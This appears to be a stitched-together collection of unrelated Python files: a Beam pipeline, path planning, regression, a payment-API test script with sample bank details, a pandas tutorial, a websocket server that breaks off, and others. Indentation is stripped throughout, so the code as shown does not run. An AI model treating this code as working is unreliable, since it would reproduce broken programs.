#Assim temos certeza que a fruta_buscada está dentro da lista antes de
#perguntarmos o seu índice, evitando assim de receber um erro no console.
'''
'''valores = ["a","b","c","d","e"]
del(valores[0]) #funciona pois é lista, não funciona com tupla
print(valores) #resultado é a retirada do A'''
'''#list usa colchetes [] para inicialização, tuple usa parênteses ()
#list é mutável, tuple é imutável
#Entre essas sequências, list é a única que é mutável. tuple, str e range são imutáveis.
# Range se comporta como tuples e strs.
lista = [4,3,2,1]
tuple = (4,3,2,1)'''
'''#tupla e lista permitem elementos duplicados, então ao usar chaves { }, não é possível duplicar elementos
#isto se chama set, set não é uma sequência, pois não tem índice, assim,
#ao fazer print, os elementos aparecem desordenados
colecao = {11122233344, 22233344455, 33344455566}
colecao.add(4455663388) #adicionar mais um elemento à coleção
print(colecao)'''
''' #A estrutura abaixo é um Dictionary. No lado esquerdo a chave e no lado direito o valor.
#Isso ajuda quando não sabemos um índice de um elemento, mas podemos buscá-lo pela
#nome (a chave em dicionário), como no caso abaixo:
instrutores = {'Nico' : 39, 'Flavio': 37, 'Marcos' : 30}
print(instrutores['Flavio'])'''
'''total = 0
palavra = "python rocks!"
acabou = False
while (not acabou):
acabou = (total == len(palavra))
total = total + 1
print(total-1)
# Por que (total - 1)????
#Pois na ultima execução ele verificara que total ==len(palavra) e em seguida
#fara novamente a soma total +1, para então sair do loop, o que vai fazer com
#que total seja igual ao tamanho da palavra mais 1 e para que seja exibido
#corretamente esse 1 deve ser subtraído'''
# List Comprehension
#
# frutas = ["maçã", "banana", "laranja", "melancia"]
# lista = [fruta.upper() for fruta in frutas]
# print(lista)
# inteiros = [1,3,4,5,7,8]
# quadrados = [n*n for n in inteiros]
# print(quadrados)
inteiros = [1,3,4,5,7,8,9]
pares = [numero for numero in inteiros if numero%2 == 0]
print(pares)
|
import sys
import os
from apache_beam.io import ReadFromText
from apache_beam.io import WriteToText
from apache_beam.options.pipeline_options import PipelineOptions
import apache_beam as beam
from logging import basicConfig, getLogger, INFO
basicConfig(level=INFO, format='%(asctime)-15s %(levelname)s %(filename)-s:%(lineno)-s: %(message)s')
logger = getLogger(__name__)
info = lambda x: logger.info(x)
from util import (
get_runner,
default_args
)
__version__ = "0.0.2"
JOB_NAME = "pixai-similarity-task-" + __version__.replace(".", "-")
PROJECT_ID = "topgate-ai-dev"
BUCKET_NAME = PROJECT_ID + "-df"
class TransformDoFn(beam.DoFn):
def start_bundle(self):
from util import download_file
if not os.path.exists("input"):
try:
os.mkdir("input")
os.mkdir("image")
os.mkdir("output")
except:
pass
big = "input/nadesico2.tar"
try:
download_file("gs://"+BUCKET_NAME+"/"+big, ""+big)
self.extract(big , "image")
except:
download_file("gs://"+BUCKET_NAME+"/"+big, ""+big)
self.extract(big , "image")
def process(self, element):
from similarity import compare_image
from util import upload_file
import pandas as pd
res1, res2, res3, res4, res5, w, h = range(7)
el1, el2 = element.strip().split(",")
pel1 = "" + el1
pel2 = "" + el2
try:
res1, res2, res3, res4, res5, w, h = compare_image(pel1, pel2)
except Exception as e:
print(e)
print(e)
try:
res1, res2, res3, res4, res5, w, h = compare_image(pel1, pel2)
except Exception as e:
print(e)
print(e)
row = pd.DataFrame([[el1, el2, res1, res2, res3, res4, res5, w, h]], columns=["truth", "scale", "ssim", "nssim", "ssim2", "nssim2", "psnr", "width", "height"])
print(row)
path = os.path.basename(el1) + "_" + os.path.basename(el2)
path = os.path.join("output", path)
csvpath = path + ".csv"
row.to_csv(csvpath, index=None, header=None)
upload_file("gs://"+BUCKET_NAME+"/"+csvpath, csvpath)
print("Task finished: " + csvpath)
def extract(self, f, path):
import tarfile
tar = tarfile.open(f)
tar.extractall(path)
tar.close()
def run(args):
print(args)
args.num_workers = 1000
options = PipelineOptions.from_dictionary(vars(args))
print(options)
# run pipeline
inputtext = "gs://{}/input/nadesico2.txt".format(BUCKET_NAME)
#outputtext = "gs:///output/nadesico2.csv".format(BUCKET_NAME)
print(args)
p = beam.Pipeline(get_runner(args.cloud), options=options)
(p | 'read' >> ReadFromText(inputtext)
| 'transform' >> beam.ParDo(TransformDoFn())
)
p.run()
#p.run().wait_until_finish()
if __name__ == "__main__":
run(default_args(sys.argv[1:], JOB_NAME, PROJECT_ID, BUCKET_NAME))
|
from params import *
from intersectionarc import *
from calculrayoncourbure import *
def cibleatteignable(segments,p,v):
[positioninit1,positioninit2,orientationinit1,orientationinit2,vinit1,vinit2,deltat,amaxlat,epsilonmax,amax,amin,tsb,l,larg,vmax,N,rv,m,alpha,lanti]=params()
Rminamaxlat=v**2/amaxlat
Rminepsilonmax=tsb*v**2/(epsilonmax*pi/180)+l/(epsilonmax*pi/180)
Rmin=max(Rminamaxlat,Rminepsilonmax)
Rmax=abs(calculrayoncourbure(p))/4
xp=p[0]
yp=p[1]
Ns=len(segments)
K=0
if xp!=0:
K=yp/xp
sgyp=1
if yp<0:
sgyp=-1
if Rmin>Rmax:
return(0,Rmax,sgyp,Rmin)
R=[]
Nr=100
i=0
while i<Nr:
R.append(Rmin+i*(Rmax-Rmin)/(Nr-1))
i+=1
i=0
while i<Nr:
r=R[i]
yc=sgyp*r
if yp==0:
return(1,Rmax,1) #on va en ligne dte
if xp!=0:
xinter=(-2*K*yc)/(1+K**2)
yinter=K*xinter
#print('xp',xp)
#print('yp',yp)
#print('xinter',xinter)
#print('yinter',yinter)
#print('r',r)
j=0
while j<Ns and intersectionarc([xinter,yinter],segments[j])!=1:
j+=1
if j==Ns:
return(1,r,sgyp,Rmin)
return(0,r,sgyp,Rmin)
xinter=0
yinter=sgyp*2*r
theta=180
j=0
while j<Ns and intersectionarc([xinter,yinter],segments[j])!=1:
j+=1
if j==Ns:
return(1,r,sgyp,Rmin)
return(0,r,sgyp,Rmin)
i+=1
|
def palindrome():
found = False
number = 9
while not found:
for i in range(1, int( number ** 0.5) + 1):
if number % i == 0:
x = str(number)
y = str(bin(number))[2:]
if (x[:len(x)/2] == x[len(x):len(x)/2:-1]) and (y[:len(y)/2] == y[len(y):len(y)/2:-1]):
found = True
return number
number += 1
a = palindrome()
print a
|
import csv
import sys
import numpy as np
import matplotlib.pyplot as plt
def checkArgs():
if (len(sys.argv) != 4):
print "Please enter three arguments. For instance, run: \
\npython lr.py train.csv test.csv 0.005"
exit(0)
train_file = sys.argv[1]
test_file = sys.argv[2]
try:
_eta = float(sys.argv[3])
except ValueError:
print "Please enter a float for the eta argument"
return train_file, test_file, _eta
def readCSV(csv_file):
# open the training file file in universal line ending mode
# Courtesy: https://stackoverflow.com/a/29082892
with open(csv_file, 'rU') as infile:
# read the file as a dictionary for each row ({header : value})
reader = csv.DictReader(infile)
parameters = reader.fieldnames
data = {}
for row in reader:
for header, value in row.items():
try:
data[header].append(value)
except KeyError:
data[header] = [value]
return data, parameters
def gradientDescent(X, W, maxIterations=100000):
prev_cost = 0.0
for i in xrange(0, maxIterations):
F = np.dot(X, W)
loss = F - Y
cost = np.sum(loss ** 2) / (2 * N)
# print("Iteration %d | Cost: %f" % (i, cost))
if (np.abs(prev_cost - cost) < 0.00000000000001):
break
prev_cost = cost
gradient = np.dot(X.transpose(), loss) / N
W = W - _eta * gradient
return W
def plotGraph(X, Y, W):
x_0 = 0
y_0 = W[0]
x_1 = 16
y_1 = W[1] * (x_1 - x_0) + W[0]
plt.scatter(np.array(X).transpose()[1], Y)
plt.title('sqft_lot vs price')
plt.xlabel('sqft_lot (x10^5)')
plt.ylabel('price (x10^5)')
# Draw these two points with big triangles to make it clear
# where they lie
plt.scatter([x_0, x_1], [y_0, y_1], marker='.', s=150, c='r')
# And now connect them
plt.plot([x_0, x_1], [y_0, y_1], c='r')
plt.show()
# # Find the slope and intercept of the best fit line
# slope, intercept = np.polyfit(np.array(X).transpose()[1], Y, 1)
# print slope, intercept
# # Create a list of values in the best fit line
# abline_values = [slope * i + intercept for i /
# in np.array(X).transpose()[1]]
# # Plot the best fit line over the actual values
# plt.plot(np.array(X).transpose()[1], Y, '.')
# plt.plot(np.array(X).transpose()[1], abline_values, 'b')
# plt.title(slope)
# plt.show()
if __name__ == '__main__':
train_file, test_file, _eta = checkArgs()
train_data, parameters = readCSV(train_file)
# Prepare actual output vector.
# Dimensions Nx1
Y = [float(x) / 100000 for x in train_data['price']]
Y = np.array(Y)
# Number of data points
N = len(Y)
# Number of input parameters
k = 1
# Prepare input matrix X.
X = [[0]] * (k + 1)
# Setting x_i_1 to 1 for all x_i
X[0] = [1] * N
# for i in xrange(1, k + 1):
# X[i] = ...
X[1] = [float(x) / 100000 for x in train_data['sqft_lot']]
# Dimensions Nx(k+1)
X = np.array(X).transpose()
# Initialising linear predictors, w = [w1, w2]
# Hypothesis- f(x) = w1 + w2*x
# Dimensions (k+1)x1
W = [0] * (k + 1)
W = np.array(W)
W = gradientDescent(X, W)
print W
plotGraph(X, Y, W)
|
#coding:utf-8
import json
import random
import request
import time
print('####################创建协议开始##################')
##创建协议入参
data1 = {"transDesc":"test1","businessId":"2","channelType":"LFT"}
#创建协议请求地址
url1 = 'http://172.29.66.21:80/api/protocol/create'
t1 = request.rzequest(url1, data1)
sss1 = json.loads(t1)
ss11 = sss1['data']
ss1 = json.loads(ss11)
transNo = ss1['transNo']
print('transNo:'+transNo,'amount:'+ss1['amount'],'onpassageAmount:'+ss1['onpassageAmount'],'outAmount:'+ss1['outAmount'])
print('####################创建协议结束##################')
print('####################查询协议开始##################')
##查询协议入参
data2 = {"transNo":transNo}
#查询协议请求地址
url2 = 'http://172.29.66.21:80/api/protocol/find'
t2 = request.request(url2, data2)
sss2 = json.loads(t2)
ss21 = sss2['data']
ss2 = json.loads(ss21)
print('transNo:'+transNo,'amount:'+ss2['amount'],'onpassageAmount:'+ss2['onpassageAmount'],'outAmount:'+ss2['outAmount'])
print('####################查询协议结束##################')
print('####################入金生成POS六位码开始##################')
##入金生成POS六位码入参
no = random.randint(1000000000,9999999999)
outReqNo = '10005'+str(no)
amount = '1000.00'
outArrivedNotifyUrl = 'www.baidu.com'
outSuccessNotifyUrl = 'www.baidu.com'
transNo = transNo
prodCatalog = '01'
data3 = {"outReqNo":outReqNo,"amount":amount,"outArrivedNotifyUrl":outArrivedNotifyUrl,"outSuccessNotifyUrl":outSuccessNotifyUrl,"transNo":transNo,"prodCatalog":prodCatalog}
#入金生成POS六位码请求地址
url3 = 'http://172.29.66.21:80/api/protocol/prepay'
t3 = request.request(url3, data3)
sss3 = json.loads(t3)
ss31 = sss3['data']
ss3 = json.loads(ss31)
outReqNo = ss3['outReqNo']
print('transNo:'+transNo,'amount:'+ss3['amount'],'outReqNo:'+ss3['outReqNo'],'posCode:'+ss3['posCode'],'payStatus:'+ss3['payStatus'])
print('####################入金生成POS六位码结束##################')
print('####################等待入金状态更新######################')
time.sleep(60)
# print('####################入金关闭POS六位码开始##################')
# ##入金关闭POS六位码入参
# data4 = {"outReqNo":outReqNo}
# #入金关闭POS六位码请求地址
# url4 = 'http://172.29.66.21:80/api/protocol/posclose'
#
# t4 = request.request(url4,data4)
#
# # sss4 = json.loads(t4)
# # ss41 = sss4['data']
# # ss4 = json.loads(ss41)
# # print('transNo:'+transNo,'amount:'+ss4['amount'],'onpassageAmount:'+ss4['onpassageAmount'],'outAmount:'+ss4['outAmount'])
#
# print('####################入金关闭POS六位码结束##################')
flag = 1
while flag:
print('####################入金查询开始##################')
##入金查询入参
data5 = {"outReqNo":outReqNo}
#入金查询请求地址
url5 = 'http://172.29.66.21:80/api/protocol/inquery'
t5 = request.request(url5, data5)
sss5 = json.loads(t5)
ss51 = sss5['data']
ss5 = json.loads(ss51)
print('transNo:'+transNo,'amount:'+ss5['amount'],'outReqNo:'+ss5['outReqNo'],'posCode:'+ss5['posCode'],'payStatus:'+ss5['payStatus'],'arrivedStatus:'+ss5['arrivedStatus'])
print('####################入金查询结束##################')
time.sleep(10)
if ss5['payStatus'] != 'UNPAID':
flag = 0
print('####################出金或退款开始##################')
##出金或退款入参
transNo = transNo
outReqNo = outReqNo
amount = '100.00'
channelType = 'LFT'
outNotifyUrl = 'www.baidu.com'
bankAccName = '李冉'
bankAccNum = '4349849854'
bankName = '中国银行'
bankCnaps = '100010'
outType = 'OUT'
remark = '付款描述'
data6 = {"transNo":transNo,"outReqNo":outReqNo,"amount":amount,"channelType":channelType,"outNotifyUrl":outNotifyUrl,"bankAccName":bankAccName,"bankAccNum":bankAccNum,"bankName":bankName,"bankCnaps":bankCnaps,"outType":outType,"remark":remark}
#出金或退款请求地址
url6 = 'http://172.29.66.21:80/api/protocol/outpay'
t6 = request.request(url6, data6)
sss6 = json.loads(t6)
ss61 = sss6['data']
ss6 = json.loads(ss61)
outReqNo = ss6['outReqNo']
print('transNo:'+transNo,'amount:'+ss6['amount'],'outReqNo:'+ss6['outReqNo'],'outType:'+ss6['outType'],'payStatus:'+ss6['payStatus'])
print('####################出金或退款结束##################')
print('####################出金或退款查询开始##################')
##出金或退款查询入参
data7 = {"outReqNo":outReqNo}
#出金或退款查询请求地址
url7 = 'http://172.29.66.21:80/api/protocol/outquery'
t7 = request.request(url7, data7)
sss7 = json.loads(t7)
ss71 = sss7['data']
ss7 = json.loads(ss71)
print('transNo:'+transNo,'amount:'+ss7['amount'],'outReqNo:'+ss7['outReqNo'],'outType:'+ss7['outType'],'payStatus:'+ss7['payStatus'])
print('####################出金或退款查询结束##################')
print('####################联行号查询开始##################')
##联行号查询入参
data8 = {"bankNameKeyWord":'海淀'}
#联行号查询请求地址
url8 = 'http://172.29.66.21:80/api/protocol/querybankcnaps'
t8 = request.request(url8, data8)
# sss8 = json.loads(t8)
# ss81 = sss8['data']
# ss8 = json.loads(ss81)
# print('transNo:'+transNo,'amount:'+ss8['amount'],'outReqNo:'+ss8['outReqNo'],'outType:'+ss8['outType'],'payStatus:'+ss8['payStatus'])
print('####################联行号查询结束##################') |
import numpy as np, os, multiprocessing, time
import myClass as STUC
ROOT = "new-data/russian/2016/"
TI = STUC.TI
Sess_dict = np.load(ROOT+"Sess_dict.npy").item(0)
''' the data structure of complex topic pattern
ldaStr=tuple(gamma),tau=tau,prob_list=Supp_gamma_tau[tau],supp=average,l=gamma_len,contain=tuple([tuple(gamma)])'''
def getWhole_STP(STPSUPP_dict):
uid_list, coll_stp_supp = sorted(STPSUPP_dict.keys()), []
set_, dict_, count = set(coll_stp_supp), {}, 0
for uid in uid_list:
if uid in STPSUPP_dict.keys():
ldaStr_list=[(stp.ldaStr,stp.len,stp.contain) for stp in STPSUPP_dict[uid]]
coll_stp_supp.extend(ldaStr_list)
for key in set_:
dict_[key]=count; count+=1
return dict_
def transform(uid_list, tau_stp_supp):
PHI = getWhole_STP(tau_stp_supp)
uid_phi_MAT = np.zeros((len(uid_list), len(PHI)), np.float32)
for i, uid in enumerate(uid_list):
if uid in tau_stp_supp.keys():
for stp in set(tau_stp_supp[uid]):
key = (tuple(stp.ldaStr), stp.len, stp.contain)
try:
index = PHI[key]
except:
print(uid, key)
else:
uid_phi_MAT[i][index] = stp.supp
return uid_phi_MAT
''' Store all patterns by user id according to the value of time-interval (tau)
TISTP_dict is a dict: key1=tau key2=user id value=CTP(seq) '''
def file2dict(input_dir,output_dir):
CTP4tau_dict = {tau: {} for i, tau in enumerate(TI)}
file_list = os.listdir(input_dir)
idlist=list(map(str, [name[:-4].split("_")[-1] for name in file_list]))
for uid in sorted(idlist):
stp_list=np.load(input_dir+"/TP_dict_%s.npy" % (uid))
print(uid, len(stp_list))
if len(stp_list) < 5:
continue
else:
for stp in stp_list: # STP_Supp(ldaStr=gamma,tau=tau,supp=Supp_gamma_tau[tau],l=gamma_len)
if uid not in CTP4tau_dict[stp.tau].keys():
CTP4tau_dict[stp.tau][uid] = []
CTP4tau_dict[stp.tau][uid].append(stp)
for i, tau in enumerate(TI):
np.save(output_dir + "/TP_dict_%s.npy" % (tau), CTP4tau_dict[tau])
def dict2mat(input_dir, tau):
if os.path.exists(input_dir + "/TP_dict_%s.npy" % (tau)):
''' tau_stp_supp[uid] = stp_list '''
tau_stp_supp = np.load(input_dir + "/TP_dict_%s.npy" % (tau)).item(0)
uid_list = sorted(tau_stp_supp.keys())
''' convert dict to mat '''
uid_phi_MAT = transform(uid_list, tau_stp_supp)
''' calculate the global support for each pattern '''
supp_sum_list = np.sum(uid_phi_MAT, axis=0)
supp_avg_list = [supp / len(uid_list) for supp in supp_sum_list]
''' storage '''
np.save(input_dir + "/TP_MAT_%s.npy" % (tau), uid_phi_MAT)
np.save(input_dir + "/global_supp_%s.npy" % (tau), supp_avg_list)
print("end converting dictionaries into matrix... ", input_dir, tau, time.time())
def run_one_tau(input_dir,output_dir):
file2dict(input_dir,output_dir)
for tau in TI:
dict2mat(output_dir, tau)
if __name__ == '__main__':
''' the mined CTPs (sequential) (min_count=2) for each user is stored in User/TISEQ_2 '''
''' the mined CTPs (interleaving) (min_count=2) for each user is stored in User/TIILV '''
''' the mined STPs (min_count=2) for each user is stored in User/STP '''
List_ = [(os.path.join(ROOT,"User/TISEQ_2"), os.path.join(ROOT, "CTP/SEQ")),
(os.path.join(ROOT,"User/TIILV"), os.path.join(ROOT, "CTP/ILV")),
(os.path.join(ROOT,"User/STP"), os.path.join(ROOT, "CTP/STP"))]
pool = multiprocessing.Pool(len(TI))
for (input_dir, output_dir) in List_:
pool.apply_async(run_one_tau, args=(input_dir, output_dir))
pool.close()
pool.join()
|
'''Test utility functions'''
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import numpy as np
import wavenet.utils as utils
def test_sample_from():
distr = np.array([
[0.1, 0.2, 0.7],
[0.4, 0.5, 0.1],
[0.1, 0.1, 0.8],
[0.9, 0.05, 0.05],
[0.33, 0.33, 0.34],
])
labels = utils.sample_from(distr)
assert labels.shape == (5, )
assert np.all(labels < 3)
assert np.all(labels >= 0)
|
import abc
from pygameAssets import pygameAssets, pygame
from object_display import Object_display
from recipe_data import Recipe_data
from points import Point, Rectangle
from price import Price
from pay import Pay
class Button(Object_display):
def __init__(self, w: int, h: int, coordinate: Rectangle):
super().__init__(w, h)
self.coordinate: Rectangle = coordinate.copy()
pygameAssets.Button.setScreen(Object_display.screen)
@abc.abstractmethod
def draw(self, other=None):
pass
def setText(self, text: str):
self.widget.setText(text)
def resize(self, w: int, h: int):
self.rec = self.coordinate.copy() * Point((w, h))
self.widget = pygameAssets.Button(self.rec.point.x, self.rec.point.y, self.rec.size.x // 2, 40,
color=(0, 200, 0), text='zapłać', textColor=(0, 0, 0),
activeColor=(0, 0, 100), fontSize=40)
@abc.abstractmethod
def click(self, event: pygame.event):
pass
class Button_ok(Button):
def __init__(self, coordinate: Rectangle, w: int, h: int, receipe: Recipe_data):
super().__init__(w, h, coordinate)
self.coordinate.move(Point((self.coordinate.size.x / 2, self.coordinate.size.y - 0.1)))
self.resize(w, h)
self.receipe = receipe
def draw(self, other=None):
if self.receipe.ingredient_completed:
self.widget.setColor((0, 200, 0))
else:
self.widget.setColor((200, 0, 0))
self.widget.draw()
def click(self, event: pygame.event):
if self.receipe.ingredient_completed:
if self.widget.isPressed(event):
Pay(self.screen_w, self.screen_h, self.receipe.price, self.receipe).run()
return False
class Button_pay(Button):
def __init__(self, coordinate: Rectangle, w: int, h: int, count: int):
super().__init__(w, h, coordinate)
self.lock = True
self.count = count
self.resize(w, h)
def draw(self, price: Price = Price()):
if self.count == price:
self.lock = False
self.widget.setColor((0, 200, 0))
else:
self.widget.setColor((200, 0, 0))
self.widget.draw()
def click(self, event: pygame.event):
if self.widget.isPressed(event):
if self.lock is False:
return True
return False
|
from django.shortcuts import render, HttpResponse, redirect
def index(request):
return render(request, 'survey/index.html')
def process(request):
if request.method == "POST":
request.session['data'] = {
"Name": request.POST['name'],
"Location": request.POST['location'],
"Language": request.POST['language'],
"Comments": request.POST['comments']
}
try:
request.session['count'] += 1
except Exception as e:
request.session['count'] = 1
return redirect('survey:result')
def result(request):
return render(request, 'survey/result.html')
|
#!/usr/local/bin/python3
import sys
import os
#function taken from https://stackoverflow.com/questions/2460177/edit-distance-in-python
def levenshteinDistance(s1, s2):
if len(s1) > len(s2):
s1, s2 = s2, s1
distances = range(len(s1) + 1)
for i2, c2 in enumerate(s2):
distances_ = [i2+1]
for i1, c1 in enumerate(s1):
if c1 == c2:
distances_.append(distances[i1])
else:
distances_.append(1 + min((distances[i1], distances[i1 + 1], distances_[-1])))
distances = distances_
return distances[-1]
#this function finds the new apk name in a repo when the build process changes the apk
#name slightly
def findAPKInRepo(repo, apkName):
apkList = []
for root, dirs, files in os.walk(repo):
for f in files:
if f.endswith('.apk'):
apkList.append(os.path.join(root, f))
if len(apkList) < 1:
print('error: unable to find any apks in repo: {0}'.format(repo))
sys.exit(1)
elif len(apkList) == 1:
return apkList[0]
else:
currentClosest = apkList[0]
currentMin = levenshteinDistance(apkName, apkList[0])
for testApk in apkList[1:]:
testMin = levenshteinDistance(apkName, testApk)
if testMin < currentMin:
currentMin = testMin
currentClosest = testApk
return currentClosest
if __name__=="__main__":
orig1 = 'org.flyve.mdm.agent_2020-01-22_210349-fcm-debug.apk'
test1 = 'org.flyve.mdm.agent_2020-01-22_211120-fcm-debug.apk'
test2 = 'org.flyve.mdm.agent_2020-01-22_211120-mqtt-debug.apk'
print(levenshteinDistance(orig1, test1))
print(levenshteinDistance(orig1, test2)) |
from transformers import AutoModel
from torch import nn
class MiniModel(nn.Module):
def __init__(self, model_name, n_labels_A, n_labels_B):
super().__init__()
self.model = AutoModel.from_pretrained(model_name)
self.first_classifier = nn.Linear(768, n_labels_A)
self.second_classifier = nn.Linear(768, n_labels_B)
def forward(self, input_ids, attention_mask):
output = self.model(input_ids, attention_mask=attention_mask)
A_logits = self.first_classifier(output[1])
B_logits = self.second_classifier(output[1])
return A_logits, B_logits
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 02 18:27:00 2015
@author: Yang
"""
import pandas as pd
import numpy as np
s=pd.Series([1,3,5,np.nan,6,8])
print s
dates = pd.date_range('20130101', periods=6)
print dates
df = pd.DataFrame(np.random.randn(6,4), index=dates, columns=list('ABCD'))
print df
df2 = pd.DataFrame({ 'A' : 1.,
'B' : pd.Timestamp('20130102'),
'C' : pd.Series(1,index=list(range(4)),dtype='float32'),
'D' : np.array([3] * 4,dtype='int32'),
'E' : pd.Categorical(["test","train","test","train"]),
'F' : 'foo' })
print df2
print df2.dtypes
print df2.C
print df.head()
print df.tail(3)
print df.index
print df.columns
print df.values
print df.describe
print df.T
print df['A']
print df[0:3]
print df['20130102':'20130104']
print df.loc[:,['A','B']]
print df.loc['20130102':'20130104',['A','B']]
print df.loc['20130102',['A','B']]
print df.loc[dates[0],'A']
print df.at[dates[0],'A']
print df.iloc[3]
print df.iloc[[1,2,4],[0,2]]
print df[df.A > 0]
print df[df > 0]
df2 = df.copy()
df2['E'] = ['one', 'one','two','three','four','three']
print df2
print df2[df2['E'].isin(['two','four'])]
s1 = pd.Series([1,2,3,4,5,6], index=pd.date_range('20130102', periods=6))
print s1
df['F'] = s1
df.at[dates[0],'A'] = 0
df.iat[0,1] = 0
df.loc[:,'D'] = np.array([5] * len(df))
print df
df2 = df.copy()
df2[df2 > 0] = -df2
print df2
df1 = df.reindex(index=dates[0:4], columns=list(df.columns) + ['E'])
df1.loc[dates[0]:dates[1],'E'] = 1
print df1
print df1.dropna(how='any')
print df1.fillna(value=5)
print df1
print pd.isnull(df1)
print df
print df.mean(1)
s = pd.Series([1,3,5,np.nan,6,8], index=dates).shift(2)
print s
print df.sub(s, axis='index')
s = pd.Series(['A', 'B', 'C', 'Aaba', 'Baca', np.nan, 'CABA', 'dog', 'cat'])
print s.str.lower()
df = pd.DataFrame(np.random.randn(10, 4))
print df
pieces = [df[:3], df[3:7], df[7:]]
print pd.concat(pieces)
left = pd.DataFrame({'key': ['foo', 'foo'], 'lval': [1, 2]})
right = pd.DataFrame({'key': ['foo', 'foo'], 'rval': [4, 5]})
print pd.merge(left, right, on='key')
print left
print right
df = pd.DataFrame({'A' : ['foo', 'bar', 'foo', 'bar',
'foo', 'bar', 'foo', 'foo'],
'B' : ['one', 'one', 'two', 'three',
'two', 'two', 'one', 'three'],
'C' : np.random.randn(8),
'D' : np.random.randn(8)})
print df
print df.groupby('A').sum()
print df.groupby(['A','B']).sum()
ts = pd.Series(np.random.randn(1000), index=pd.date_range('1/1/2000', periods=1000))
ts = ts.cumsum()
ts.plot()
df = pd.DataFrame(np.random.randn(1000, 4), index=ts.index,
columns=['A', 'B', 'C', 'D'])
df = df.cumsum()
df.plot()
|
import math
class Solution(object):
def countPrimes(self, n):
"""
:type n: int
:rtype: int
"""
count=0
primes=[True]*n
for i in range(2,int(math.sqrt(n))+1):
if primes[i]==False:
continue
for j in range(i*i,n,i):
primes[j]=False
for i in range(2,n):
if primes[i]:
count+=1
return count
|
from typing import List
from ..parser.ast import AST, Node
from ..scanner.tokens import Tokens
from ..semantic import COMPUTATION_NODES, CONSTANT_NODES
class CodeGenerator:
"""
Generates code for the dc language from an AST of the ac language.
"""
def __init__(self, ast: AST):
self.ast = ast
self.generated = list()
def visit_assignment(self, node: Node) -> None:
"""
Visits an assignment node and emits dc code for that assignment
:param node: the assignment node to visit and emit dc code for
"""
self.codegen(node.right())
self.emit("s")
self.emit(f"{node.left().value}") # emit ID
self.emit("0 k")
def visit_computation(self, node: Node) -> None:
"""
Visits a computation node and emits dc code for that computation
:param node: the computation node to visit and emit dc code for
"""
self.codegen(node.left())
self.codegen(node.right())
self.emit("+" if node.type == Tokens.PLUS else "-")
def visit_reference(self, node: Node) -> None:
"""
Visits a reference node and emits the ID of that node
:param node: the reference node to visit and emit dc code for
"""
self.emit("l")
self.emit(node.value)
def visit_print(self, node: Node) -> None:
"""
Visits a print node and emits the value of the symbol referenced in that node
:param node: the print node to visit and emit dc code for
"""
self.emit("l")
self.emit(node.value)
self.emit("p")
self.emit("si")
def visit_convert(self, node: Node) -> None:
"""
Visits a convert node, emit the value of child, and emit dc code to change the
precision level to five decimal places.
:param node: the convert node to visit and emit dc code for
"""
self.emit(node.child().value)
self.emit("5 k")
def visit_constant(self, node: Node) -> None:
"""
Visits a constant node and emits its value in dc code.
:param node: the constant node to visit and emit dc code for
"""
self.emit(node.value)
def codegen(self, node: Node) -> None:
"""
Generates dc code by calling the relevant visitor method for the given node.
:param node: the node to generate dc code for.
"""
for child in node.children:
self.codegen(child)
if node.type == Tokens.ASSIGN:
self.visit_assignment(node)
elif node.type in COMPUTATION_NODES:
self.visit_computation(node)
elif node.type == Tokens.ID:
self.visit_reference(node)
elif node.type == Tokens.PRINT:
self.visit_print(node)
elif node.type == Tokens.CONVERT:
self.visit_convert(node)
elif node.type in CONSTANT_NODES:
self.visit_constant(node)
def emit(self, code: str) -> None:
"""
Append generated code to the list of produced code.
:param code: the code string to append to the list of generated code
"""
self.generated.append(code)
def generate(self) -> List[str]:
"""
Generate dc code from the AST produced by the parser
:return: the list of generated dc code statements
"""
self.codegen(self.ast.root)
return self.generated
|
from os import listdir
from numpy import asarray
from numpy import savez_compressed
from PIL import Image
from mtcnn.mtcnn import MTCNN
from matplotlib import pyplot
def load_image(filename):
# load image from file
image = Image.open(filename)
# convert to RGB, if needed
image = image.convert('RGB')
# convert to array
pixels = asarray(image)
return pixels
def load_faces(directory, n_faces):
# prepare model
model = MTCNN()
faces = list()
# enumerate files
for filename in listdir(directory):
# load the image
pixels = load_image(directory + filename)
# store
faces.append(pixels)
print(len(faces), pixels.shape)
# stop once we have enough
if len(faces) >= n_faces:
break
return asarray(faces)
# directory that contains all images
directory = 'otherImgs/'
# load and extract all faces
all_faces = load_faces(directory, 1620)
print('Loaded: ', all_faces.shape)
# save in compressed format
savez_compressed('images.npz', all_faces) |
import time
def addHeightsToDict(x, dictHeights):
if x in dictHeights:
dictHeights[x] = dictHeights[x] + 1
else:
dictHeights[x]=1
return dictHeights
start_time = time.time()
# f = open("B-small-attempt01.in")
# f = open("B-large01.in")
f = open("B-large1.in")
result = open('B-large1.in.txt', 'w')
# result = open('B-large-output.txt', 'w')
cases = int(f.readline().rstrip())
for x in xrange(0, cases):
N = int(f.readline().rstrip())
dictHeights = {}
for h in xrange(0, 2*N - 1):
rowCol = f.readline().rstrip().split()
abc = map(lambda x: addHeightsToDict(x, dictHeights), rowCol)
# get only odd (missing) items
missingRowColDict = {k:v for k,v in dictHeights.iteritems() if v%2 != 0 }
# convert missing row into sorted list
missingRowCol = map(int, missingRowColDict.keys())
missingRowCol.sort()
print missingRowCol
caseResult = "Case #"+str(x+1)+": " + ' '.join(map(str, missingRowCol)) + "\n"
result.write(caseResult)
f.close()
result.close()
print("--- %s seconds ---" % (time.time() - start_time))
|
import json
import time
import tornado.websocket
import services.dbHandler as database
database.init_database()
debug = True
clients = []
# Socket Handler
class WebSocketHandler(tornado.websocket.WebSocketHandler):
def open(self):
if 'Hostname' in self.request.headers:
client_hostname = self.request.headers['Hostname']
else:
client_hostname = 'interface'
self.hostname = client_hostname
database.init_client_state(client_hostname)
print('New client connection with hostname: ' + client_hostname)
self.send_all('new_connection')
clients.append(self)
def on_message(self, message):
global database
message_decoded = json.loads(message)
print('Receiving from client: %s' % message_decoded)
if 'type' in message_decoded:
if 'rpi_client' == message_decoded['type']:
update_table(message_decoded)
if 'interface' == message_decoded['type']:
self.send_all("command", True, message_decoded['message'])
def on_close(self):
print('Client connection closed')
print(self.hostname)
clients.remove(self)
def send_all(self, type, include_self=False, msg=None):
for client in clients:
if client.hostname != self.hostname or include_self:
client.write_message({
'hostname': self.hostname,
'message': msg,
'type': type,
})
def pre_update():
def decorated(func):
def wrapper(*args, **kwargs):
print("Exécution de la fonction %s." % func.__name__)
response = func(*args, **kwargs)
print("Post-traitement.")
analyse_db()
return response
return wrapper
return decorated
@pre_update()
def update_table(msg):
